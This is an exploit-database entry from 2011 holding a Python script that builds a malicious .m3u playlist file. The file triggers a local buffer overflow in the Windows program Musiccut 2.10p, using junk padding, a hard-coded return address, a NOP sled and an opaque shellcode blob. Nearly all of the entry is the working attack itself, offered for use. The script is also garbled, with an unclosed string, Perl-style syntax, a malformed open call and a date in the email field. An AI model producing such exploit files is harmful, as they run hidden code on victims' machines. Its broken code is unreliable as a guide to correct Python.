Musiccut210p Local Buffer Overflow

2011-09-01T00:00:00
ID 1337DAY-ID-16811
Type zdt
Reporter Angel Injection
Modified 2011-09-01T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/python
print " Title Exploit: Musiccut210p Local Buffer Overflow"
print " Auther: Angel Injection"
print " Email: 1/9/2011"
print " Home Page: http://www.1337day.com http://www.sec-krb.org"

filename = exploit.m3u"

junk = "\x41" * 860
ret = "\xED\x5D\xEB\x3E"
nop = "x90" x 10
shellcode =
"\xbb\x28\x7b\x6f\x3a\xdd\xc3\x29\xc9\xb1\x56\xd9\x74\x24\xf4"
"\x5e\x31\x5e\x14\x03\x5e\x14\x83\xee\xfc\xca\x8e\x93\xd2\x83"
"\x71\x6c\x23\xf3\xf8\x89\x12\x21\x9e\xda\x07\xf5\xd4\x8f\xab"
"\x7e\xb8\x3b\x3f\xf2\x15\x4b\x88\xb8\x43\x62\x09\x0d\x4c\x28"
"\xc9\x0c\x30\x33\x1e\xee\x09\xfc\x53\xef\x4e\xe1\x9c\xbd\x07"
"\x6d\x0e\x51\x23\x33\x93\x50\xe3\x3f\xab\x2a\x86\x80\x58\x80"
"\x89\xd0\xf1\x9f\xc2\xc8\x7a\xc7\xf2\xe9\xaf\x14\xce\xa0\xc4"
"\xee\xa4\x32\x0d\x3f\x44\x05\x71\x93\x7b\xa9\x7c\xea\xbc\x0e"
"\x9f\x99\xb6\x6c\x22\x99\x0c\x0e\xf8\x2c\x91\xa8\x8b\x96\x71"
"\x48\x5f\x40\xf1\x46\x14\x07\x5d\x4b\xab\xc4\xd5\x77\x20\xeb"
"\x39\xfe\x72\xcf\x9d\x5a\x20\x6e\x87\x06\x87\x8f\xd7\xef\x78"
"\x35\x93\x02\x6c\x4f\xfe\x4a\x41\x7d\x01\x8b\xcd\xf6\x72\xb9"
"\x52\xac\x1c\xf1\x1b\x6a\xda\xf6\x31\xca\x74\x09\xba\x2a\x5c"
"\xce\xee\x7a\xf6\xe7\x8e\x11\x06\x07\x5b\xb5\x56\xa7\x34\x75"
"\x07\x07\xe5\x1d\x4d\x88\xda\x3d\x6e\x42\x6d\x7a\xa0\xb6\x3d"
"\xec\xc1\x48\xd7\x5f\x4c\xae\xbd\x8f\x19\x78\x2a\x6d\x7e\xb1"
"\xcd\x8e\x54\xed\x46\x18\xe0\xfb\x51\x27\xf1\x29\xf2\x84\x59"
"\xba\x81\xc6\x5d\xdb\x95\xc3\xf5\x92\xad\x83\x8c\xca\x7c\x32"
"\x90\xc6\x17\xd7\x03\x8d\xe7\x9e\x3f\x1a\xbf\xf7\x8e\x53\x55"
"\xe5\xa9\xcd\x48\xf4\x2c\x35\xc8\x22\x8d\xb8\xd0\xa7\xa9\x9e"
"\xc2\x71\x31\x9b\xb6\x2d\x64\x75\x61\x8b\xde\x37\xdb\x45\x8c"
"\x91\x8b\x10\xfe\x21\xca\x1d\x2b\xd4\x32\xaf\x82\xa1\x4d\x1f"
"\x43\x26\x35\x42\xf3\xc9\xec\xc7\x03\x80\xad\x61\x8c\x4d\x24"
"\x30\xd1\x6d\x92\x76\xec\xed\x17\x06\x0b\xed\x5d\x03\x57\xa9"
"\x8e\x79\xc8\x5c\xb1\x2e\xe9\x74\xbb"
pwn = junk+ret+nop+shellcode
FILE =open(filename. "w")
FILE.write(pwn)
FILE(close)
print " Exploit File created succesully" 



#  0day.today [2018-01-03]  #